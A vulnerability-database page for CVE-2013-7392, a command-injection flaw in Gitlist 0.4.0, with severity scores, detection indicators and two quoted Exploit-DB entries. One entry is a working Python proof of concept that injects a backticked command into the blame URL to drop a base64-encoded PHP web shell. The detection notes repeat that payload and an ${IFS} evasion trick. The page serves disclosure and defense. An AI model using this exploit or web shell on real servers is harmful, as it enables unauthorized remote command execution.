CVE-2013-7392
published 2014-07-22CVE-2013-7392: Gitlist allows remote attackers to execute arbitrary commands via shell metacharacters in a file name to Source/.
PriorityP264high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.48%
94.3th percentile
Gitlist allows remote attackers to execute arbitrary commands via shell metacharacters in a file name to Source/.
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor web server logs for POST/GET requests to /cache/x.php, which is the dropped webshell path used by the exploit. ↗
- →Detect the base64-encoded PHP webshell payload string 'PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo=' appearing in HTTP request URIs, which decodes to a system() shell. ↗
- →Flag use of ${IFS} as a space-bypass technique in HTTP request URIs targeting Gitlist blame endpoints, a characteristic evasion used by the Metasploit module. ↗
- ·The exploit targets specifically Gitlist version 0.4.0; the vulnerability is in the blame handler's failure to sanitize filenames containing shell metacharacters. ↗
- ·The exploit requires knowledge of a writable cache path on the target server to drop the webshell; the path is passed as a command-line argument. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Gitlist - Remote Command Execution (Metasploit)
exploitdb·2014-07-07
CVE-2014-4511 Gitlist - Remote Command Execution (Metasploit)
Gitlist - Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Gitlist Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
crafted file name when trying to blame it.
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'drone', #discovery/poc by @dronesec
'Brandon Perry ' #Metasploit module
],
'References' =>
[
['CVE', '2014-4511'],
['EDB', '33929'],
['URL', 'http://hatriot.github.io/blog/2014/06/29/gitl
Exploit-DB
Gitlist 0.4.0 - Remote Code Execution
exploitdb·2014-06-30·CVSS 7.5
CVE-2014-5023 [HIGH] Gitlist 0.4.0 - Remote Code Execution
Gitlist 0.4.0 - Remote Code Execution
---
from commands import getoutput
import urllib
import sys
"""
Exploit Title: Gitlist 2:
path = sys.argv[2]
print '[!] Using cache location %s' % path
# payload
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="
# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)
out = getoutput("wget %s" % mpath)
if '500' in out:
print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
print '[-] Failed to drop'
print out
No writeups or analysis indexed.
2014-07-22
Published